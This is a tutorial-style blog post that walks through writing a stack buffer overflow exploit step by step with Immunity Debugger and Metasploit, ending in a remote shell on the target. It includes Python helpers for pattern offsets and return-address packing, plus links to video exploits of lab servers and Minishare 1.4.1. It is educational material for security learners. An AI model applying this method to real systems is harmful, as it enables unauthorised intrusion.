Writing Buffer Overflows for Non-Programmers

by Ashes

Buffer overflows have been a pretty serious security threat ever since Phrack Magazine published "Smashing The Stack For Fun And Profit" by Aleph One many years ago.

Buffer overflows are typically used to either crash a program or computer or to inject code into a program.

As a hacker without programming skills, it's sometimes difficult to grasp concepts that involve coding, let alone to attempt programming something myself.  Thanks to Vivek Ramachandran from SecurityTube.Net (PentesterAcademy) and his incredibly helpful videos, I am able to understand the concept of writing a buffer overflow.  I recommend watching the tutorial videos on Vivek's website to fully understand what is going on (be a hacker, not a script kiddie!).  However, I have broken down the process of writing a buffer overflow into a checklist for reference.  Hopefully this will help others understand how a buffer overflow works, and how to write one.  Vivek programs his exploit code in Python, but you can adapt the code to other languages.

Some Terms

Steps

1.)  Open the Immunity Debugger (ID) application.  It should open with four windows:

2.)  Open the vulnerable program in ID, and hit the "Play" button at the top.

3.)  Use the pattern_create.rb script in Metasploit to create a long, non-repeating pattern of characters.  Because every four-character window of the pattern is unique, the bytes that land in the return address can be identified in ID.

4.)  Write a simple exploit program to send the characters created in Step 3 to the vulnerable program.  (See Resource #1 below at time 11:36.)

5.)  Launch the exploit code.

6.)  Switch back to the ID application.  Identify the value of EIP in the Registers Window.

7.)  Use the value of EIP found in Step 6 as input to the pattern_offset.rb script (part of Metasploit).  The output tells you where in the pattern from Step 3 the EIP value is found.  For example, if the output is 268, you count 268 characters, and the next four characters are what is copied into EIP.

8.)  For ESP, use the first five characters shown after ASCII in the Registers Window as input to pattern_offset.rb.  The output is most commonly (not always) four more than the EIP output (268 + 4 = 272).

(Note that the addresses of ESP and EIP in the Registers Window correlate with the values in the Stack Window.)

9.)  To verify that the addresses and offsets are correct, edit your exploit code.  Remove the pattern from Step 3 and insert the character "A" as many times as the output from Step 7 (e.g., 268).  Append the character "B" as many times as the difference between the output of Step 8 and Step 7 (e.g., four).  Append the character "C" four times.  Append the character "D" an arbitrary number of times (e.g., 1900).

10.)  Open the vulnerable program in ID, and hit the "Play" button at the top.

11.)  Launch the exploit code.

12.)  In ID, the Registers Window should show EIP as 42424242, which is the hex value of four ASCII "B" characters.  ESP should point at the ASCII string CCCCDDDDDDD...

13.)  In ID, note the address value of ESP (not the ASCII value it points to).  In the exploit code, this address must be written in little-endian order: split it into bytes (pairs of hex digits), reverse their order, and write each as a \x hex escape so the bytes are interpreted as raw values.  This goes in the spot where the character "B" was written in Step 9.  Simply put, if the ESP address value is 0022FB70, it is written in the exploit code as \x70\xFB\x22\x00.

14.)  Use MSFpayload to create a payload with C code output.

15.)  Copy the payload bytes that appear underneath the line unsigned char buf[] = and paste them into the exploit code where the "C" characters were placed in Step 9.  Remove the line in the code that appends the character "D".

16.)  Set up Metasploit for an incoming connection.

17.)  Run the vulnerable program and launch the exploit code.  You should now have a shell on the system where the vulnerable program is installed.
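Steps 3, 7, 8, 9 and 13 rely on the pattern and offset arithmetic that Metasploit's pattern_create.rb and pattern_offset.rb perform.  The following Python is an added illustration of that arithmetic (it is not Vivek's code and not a copy of the Metasploit scripts): it builds the same cyclic pattern, locates a value read from the Registers Window whether it is typed as four ASCII characters or as the eight-digit hex dword the debugger displays, lays out the A/B/C/D verification buffer, and packs an address in little-endian order.  The offsets 268 and 272 and the address 0022FB70 are the page's own example values.

```python
import struct

# Character sets used by Metasploit's pattern_create.rb (upper, lower, digit).
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"
HEX = set("0123456789abcdefABCDEF")


def pattern_create(length):
    """Step 3: build the cyclic 'Aa0Aa1Aa2...' string.  Every 4-byte window is
    unique; this version stops at 20280 bytes (26 * 26 * 10 chunks of 3)."""
    pattern = ""
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                if len(pattern) >= length:
                    return pattern[:length]
                pattern += u + l + d
    return pattern[:length]


def pattern_offset(value, length=5000):
    """Steps 7 and 8: find where a 4-byte value sits in the pattern.  Accepts the
    4 ASCII characters or the 8-hex-digit dword shown in the Registers Window.
    A dword is little-endian, so its bytes are reversed before searching.
    Returns -1 when the value did not come from the pattern."""
    if len(value) == 8 and set(value) <= HEX:
        needle = bytes.fromhex(value)[::-1].decode("latin-1")
    else:
        needle = value
    return pattern_create(length).find(needle)


def verification_buffer(eip_offset, esp_offset, d_count=1900):
    """Step 9: 'A' up to EIP, 'B' over EIP, four 'C' at ESP, then 'D' filler."""
    return (b"A" * eip_offset + b"B" * (esp_offset - eip_offset)
            + b"C" * 4 + b"D" * d_count)


def pack_address(addr_hex):
    """Step 13: '0022FB70' as displayed by the debugger becomes the little-endian
    bytes \\x70\\xFB\\x22\\x00 that replace the 'B' characters."""
    return struct.pack("<I", int(addr_hex, 16))


if __name__ == "__main__":
    print(pattern_create(24))           # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7
    print(pattern_offset("6A413969"))  # 268 (EIP dword as shown in ID)
    print(pattern_offset("0Aj1"))      # 272 (first ASCII chars at ESP)
    print(pack_address("0022FB70"))    # b'p\xfb"\x00'
```

A return value of -1 from pattern_offset means EIP was not overwritten by the pattern at all, which is the first thing to check when Step 7 gives nothing useful.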

Many thanks to Vivek Ramachandran for his great teaching ability.

Resources

  1. www.securitytube.net/video/1398  Exploit Research MegaPrimer - Part 2: Memcpy Buffer Overflow  (YouTube)
    • Welcome to Part 2 of the Exploit Research MegaPrimer.  Please begin this series by watching Part 1, if you have not already done so!  In this video, we will look at how to exploit a simple buffer overflow caused by misuse of the memcpy function.  You can download the vulnerable server Server-Memcpy.exe and follow this video.  I take you through a 30 minute journey which starts with bug discovery with a crash, analyzing the crash with Immunity Debugger, finding where the return address and ESP are overwritten using byte patterns created by pattern_create of the Metasploit framework, creating the payload, creating the exploit script and finally exploiting the vulnerable server!  The grand prize is that we are able to get a remote shell on the victim over port 10000.  Grab a coffee and join me in this epic journey from bug to root!  All in 30 minutes :)

  2. www.securitytube.net/video/1399  Exploit Research MegaPrimer - Part 3: Strcpy Buffer Overflow  (YouTube)
    • Welcome to Part 3 of the Exploit Research MegaPrimer.  Please begin this series by watching Part 1, if you have not already done so!  In this video, we will look at how to exploit a simple buffer overflow caused by misuse of the strcpy function.  You can download the vulnerable server Server-Strcpy.exe and follow this video.  We will take the vulnerable server, understand how it works, write a Python program to cause a buffer overflow, use Immunity Debugger to investigate the buffer overflow, find the offset of the Return Address and ESP from the start of the user input.  Then we will create a payload and try to exploit the overflow, but we will figure out that our payload and return address contain the bad character 0x00.  We will then learn how to find bad characters, use a JMP ESP address in a DLL to exploit this overflow, use MSFpayload and msfencode to create a payload without the bad characters to finally exploit this overflow!  We will be looking at some new concepts which include jumping to our payload on the stack using a "JMP ESP" instruction, finding and removing bad characters and understanding the need for a NOP sled.  Hope you enjoy this video!  It's a 30 minute long journey :)

  3. www.securitytube.net/video/1400  Exploit Research MegaPrimer - Part 4: Minishare Buffer Overflow  (YouTube)
    • Welcome to Part 4 of the Exploit Research MegaPrimer.  Please begin this series by watching Part 1, if you have not already done so!  In this video, we will look at how to exploit a buffer overflow which was disclosed on Exploit-Db - Minishare 1.4.1 Buffer Overflow.  You can download the Minishare v1.4.1 program and follow this video.  We will first start by understanding the vulnerability from its description on Exploit-Db and then reproduce the same in our lab setup.  After this, we will use the Immunity Debugger to examine the exploit conditions, find the offsets for RET and ESP overwrite, find the bad characters which are 0x00 and 0x0D, create shellcode for the payload encoding for these bad characters, create the exploit program and finally exploit the program!  This whole journey is 30 minutes long, so fasten your seat belts and take out your debuggers :)